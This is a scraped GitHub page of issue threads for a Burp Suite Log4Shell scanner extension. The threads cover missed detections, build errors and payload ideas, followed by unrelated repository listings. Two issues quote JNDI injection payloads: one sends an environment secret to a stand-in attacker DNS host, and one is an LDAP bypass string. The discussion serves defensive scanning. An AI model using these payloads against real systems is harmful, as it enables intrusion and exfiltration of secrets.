silentsignal / burp-log4shell Goto Github PK
View Code? Open in Web Editor NEWLog4Shell scanner for Burp Suite
License: GNU General Public License v3.0
Log4Shell scanner for Burp Suite
License: GNU General Public License v3.0
Hi,
Any reason why the Log4Shell scanner is removed from the bApps extensions?
Hi folks,
while the method you described to only scan for log4j is viable there is an easier way to do it in Burp, via adding a context menu option. It should go something like:
scanMenu = JMenuItem("Log4j scan")
scanMenu.addActionListener(startScan(self))
self.menu = JPopupMenu("Popup")
self.menu.add(scanMenu)
callbacks.registerContextMenuFactory(self)
where startScan
is something like:
class sendRequestRepeater(ActionListener):
def __init__(self, extender):
self._extender = extender
def actionPerformed(self, e):
self._extender.doActiveScan(...);
return
I know this in Python but you get the idea; there are many extensions that hook into registerContextMenuFactory
so you can just copy from there. Let me know if I can help, cheers :)
Fisher
I wonder if it would make sense to generate a low confidence issue if the answer takes >29s to arrive (I've read that Java timeouts after 31s and Burp drops the conn at 30s IIRC), as this can indicate that someone is trying to resolve our JNDI host on the backend?
Hi! I've just installed burp pro out of box and the only extension I have added is yours. Unfortunately I am not able to discover any trails of log4shell even I have identified few of such that should be reported based on release notes etc.. Are there any extra plugins/settings that should be enabled/installed to make it scan successfully? Also - should the scan be started from the "/" URL of the target ?
Thanks !
Describe the bug
Even with LDAP to remote host being stopped by using a modern Java version, there are still more ways to exploit the CVE.
But (based on looking at the source) this scan only checks the LDAP exploit path.
So a clean sheet from this scan doesn't mean that you're not vulnerable.
Example of a non-LDAP attack:
${jndi:dns://attackers-dns-server.com/somedomain${env:SECRET_TO_LEAK_VIA_DNS_QUERY}}
or via Factory Gadget attacks
See Appendix B of https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/
Sanity Check
Using the docker image at https://github.com/christophetd/log4shell-vulnerable-app, this plug fails to detect any issues. I've tried the prebuilt jar, and even tried building myself. Same results.
Hello,
It's been a while since I've executed .jar
files, I was under the impression that the command is java -jar
, yet I get the following:
java -jar burp-log4shell.jar
no main manifest attribute, in burp-log4shell.jar
Environment:
java --version
openjdk 11.0.13 2021-10-19
OpenJDK Runtime Environment 18.9 (build 11.0.13+8)
OpenJDK 64-Bit Server VM 18.9 (build 11.0.13+8, mixed mode)
In my internal environment testing we've found some hosts/products that have been vulnerable to the Log4J vulnerability but where it would only fire if the URI path was NOT URL encoded. These hosts are not showing any vulnerable parameters when scanned using the plugin but will fire if I take the payload, un-encode it, and replay it in Repeater. When we check the logs generated, we found that it is logging the raw URI and this was causing the payload to not be interpreted by the vulnerable class. In these hosts, only the URI was vulnerable so the other non-encoded positions such as User-Agent were not being processed.
Thanks for putting this out, BTW!
Hi,
Could you please confirm whether Log4Shell Scanner Burpsuite Pro Addon is capable to identify log4j vulnerabilities of CVE-2021-44832, CVE-2021-45105 & CVE-2021-45046.
Thanks
Saleem Choudary
This will require improved payloads:
https://twitter.com/marcioalm/status/1471740771581652995
Example from the twitter:
${jndi:ldap://127.0.0.1#evilhost.com:1389/a}
Hi,
To be able to build this I have to change the protobuf version in build.gradle to be:
classpath "gradle.plugin.com.google.protobuf:protobuf-gradle-plugin:0.8.18"
Hi! I think that the hard way can be simplified in this way:
Extension generated issue
I suggest this plugins can add some scan rules
For example:
I should it can use payload add on 'Accept' of 'Request'
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.